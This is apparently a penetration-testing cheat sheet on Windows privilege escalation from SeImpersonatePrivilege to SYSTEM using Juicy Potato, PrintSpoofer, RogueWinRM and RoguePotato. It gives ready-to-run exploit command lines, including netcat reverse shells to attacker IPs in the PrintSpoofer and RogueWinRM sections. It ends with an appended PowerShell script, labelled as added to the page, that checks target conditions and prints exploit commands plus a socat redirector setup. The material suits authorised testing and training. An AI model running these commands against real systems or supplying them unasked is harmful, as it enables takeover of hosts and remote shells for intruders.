
SeImpersonatePrivilege

If you hold this privilege you are most likely running as a service account, and you will almost certainly end up as NT AUTHORITY\SYSTEM: SeImpersonatePrivilege lets your process impersonate any token it can obtain a handle to, and every Potato variant below works by tricking a SYSTEM service into authenticating to a listener you control so that you can impersonate its token.


Last updated 2 years ago

Rule of thumb: on Windows Server 2016 and older (and Windows 10 up to 1803) use Juicy Potato. Starting with Windows 10 1809 / Server 2019 Microsoft broke the DCOM/OXID resolver trick Juicy Potato relies on, so on those builds use PrintSpoofer (needs the Print Spooler service running), RoguePotato (needs a host you control acting as an OXID redirector on TCP/135) or RogueWinRM (needs the WinRM service stopped so that port 5985 is free). Checking which of those conditions hold before uploading a binary saves a lot of guessing.

Juicy Potato

Pick one CLSID from the list in the Juicy Potato repository (linked below) that matches your exact Windows version: CLSIDs differ between builds, and a CLSID that works on Server 2016 may not exist on Server 2012, in which case the exploit simply never gets the callback.

Download the Juicy Potato binary (x86 or x64 to match the target) from the releases page linked below.

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

-p is the program launched as SYSTEM and -a its arguments, -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -l is any free local port for the COM listener and -c is the CLSID picked above. If it fails, try another CLSID before changing anything else.

RoguePotato

I have never played with this one, but it should work in most cases.

PrintSpoofer

Requires the Print Spooler service to be running on the target. -c is the command to run as SYSTEM; -i attaches it to the current console, which is what you want from an interactive shell, while the second form (spawn a reverse shell) is better from a blind or web shell:

.\PrintSpoofer.exe -i -c cmd

.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"

RogueWinRM

Only works when the WinRM service is not running (the default on Windows 10 client builds, but not on Server 2019), because the tool has to bind port 5985 itself; it then waits for the BITS service to connect to it as SYSTEM, which can take a couple of minutes. -p is the program to run and -a its arguments:

.\RogueWinRM.exe -p C:\windows\system32\cmd.exe

.\RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"
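The decision in these notes (Juicy Potato below Server 2019, otherwise PrintSpoofer, RogueWinRM or RoguePotato depending on which service is running) can be made on the box before uploading anything. The script below is an added triage helper written for this page; it is not part of the original notes nor of any of the Potato tools. It checks for the privilege, the OS build, the Spooler state and whether WinRM holds port 5985, then prints the commands to try in the same syntax the notes use. Everything not taken from the page is an assumption: the binaries are staged in $ToolDir, $Redirector is an attacker host you control (needed by RoguePotato, which also needs socat or similar forwarding TCP/135 on that host to the target's -l port), the CLSID is a placeholder you replace from the Juicy Potato list, and the proof file path is arbitrary.

```powershell
# Added triage helper for the SeImpersonatePrivilege notes (not part of the
# original page nor of any Potato tool). Assumptions, not from the page:
# tool binaries in $ToolDir, a redirector you control at $Redirector for
# RoguePotato, and a placeholder CLSID you must replace for your build.
param(
    [string]$ToolDir    = 'C:\Windows\Temp',
    [string]$Redirector = '10.10.14.5',                # assumed attacker host
    [string]$Clsid      = '{REPLACE-WITH-CLSID}',      # see Juicy Potato CLSID list
    [string]$Program    = 'cmd.exe',
    [string]$Arguments  = '/c whoami > C:\Users\Public\proof.txt'
)

# 1. Do we hold the privilege at all? whoami /priv lists it even when it is
#    Disabled; the tools enable it themselves, so Disabled is fine.
$hasImpersonate = [bool](whoami /priv | Select-String -Pattern 'SeImpersonatePrivilege' -Quiet)
if (-not $hasImpersonate) {
    Write-Output 'SeImpersonatePrivilege not held: none of the Potatoes apply.'
    return
}

# 2. OS build. Juicy Potato relies on a DCOM/OXID trick fixed in Windows 10
#    1809 / Server 2019 (build 17763), so it is only a candidate below that.
$os    = Get-CimInstance -ClassName Win32_OperatingSystem
$build = [int]$os.BuildNumber
Write-Output ("OS: {0} (build {1})" -f $os.Caption, $build)

# 3. Print Spooler state: PrintSpoofer needs it running.
$spooler        = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$spoolerRunning = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')

# 4. WinRM: RogueWinRM must bind 5985 itself, so the service has to be stopped
#    and the port free. Get-NetTCPConnection throws when nothing matches, which
#    is exactly the "port free" case, hence the try/catch.
$winrm        = Get-Service -Name WinRM -ErrorAction SilentlyContinue
$winrmRunning = ($null -ne $winrm) -and ($winrm.Status -eq 'Running')
$port5985Busy = $false
try {
    $port5985Busy = [bool](Get-NetTCPConnection -LocalPort 5985 -State Listen -ErrorAction Stop)
} catch { $port5985Busy = $false }

# 5. Build the candidate list in the order a practitioner would try them.
$candidates = @()
if ($build -lt 17763) {
    $candidates += ('JuicyPotato : {0}\JuicyPotato.exe -p {1} -a "{2}" -t * -l 1031 -c {3}' -f `
        $ToolDir, $Program, $Arguments, $Clsid)
}
if ($spoolerRunning) {
    $candidates += ('PrintSpoofer: {0}\PrintSpoofer.exe -c "{1} {2}"' -f $ToolDir, $Program, $Arguments)
}
if (-not $winrmRunning -and -not $port5985Busy) {
    $candidates += ('RogueWinRM  : {0}\RogueWinRM.exe -p {1} -a "{2}"   (wait up to ~2 min for BITS)' -f `
        $ToolDir, $Program, $Arguments)
}
# RoguePotato has no local service dependency; it needs your redirector listening
# on TCP/135 and forwarding to the port given with -l (9999 here, assumed).
$candidates += ('RoguePotato : {0}\RoguePotato.exe -r {1} -e "{2} {3}" -l 9999   (first run "socat tcp-listen:135,reuseaddr,fork tcp:<target>:9999" on {1})' -f `
    $ToolDir, $Redirector, $Program, $Arguments)

Write-Output ("Spooler running: {0}; WinRM running: {1}; port 5985 busy: {2}" -f $spoolerRunning, $winrmRunning, $port5985Busy)
Write-Output 'Try in this order:'
$candidates | ForEach-Object { Write-Output ("  " + $_) }
```

Run it from the low-privileged service shell (`powershell -ep bypass -f triage.ps1`); it only reads state and prints commands, so it is safe to run before deciding which binary to drop. Get-NetTCPConnection is absent on Windows 7 / Server 2008 R2, where the catch block simply reports the port as free and you should confirm with netstat -ano instead.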

References

Juicy Potato CLSID list: https://github.com/ohpe/juicy-potato/tree/master/CLSID
Juicy Potato releases: https://github.com/ohpe/juicy-potato/releases
RoguePotato: https://github.com/antonioCoco/RoguePotato
RoguePotato 1.0 release: https://github.com/antonioCoco/RoguePotato/releases/tag/1.0
RoguePotato write-up (decoder.cloud): https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
PrintSpoofer: https://github.com/itm4n/PrintSpoofer
PrintSpoofer v1.0 release: https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
RogueWinRM: https://github.com/antonioCoco/RogueWinRM
RogueWinRM 1.1 release: https://github.com/antonioCoco/RogueWinRM/releases/tag/1.1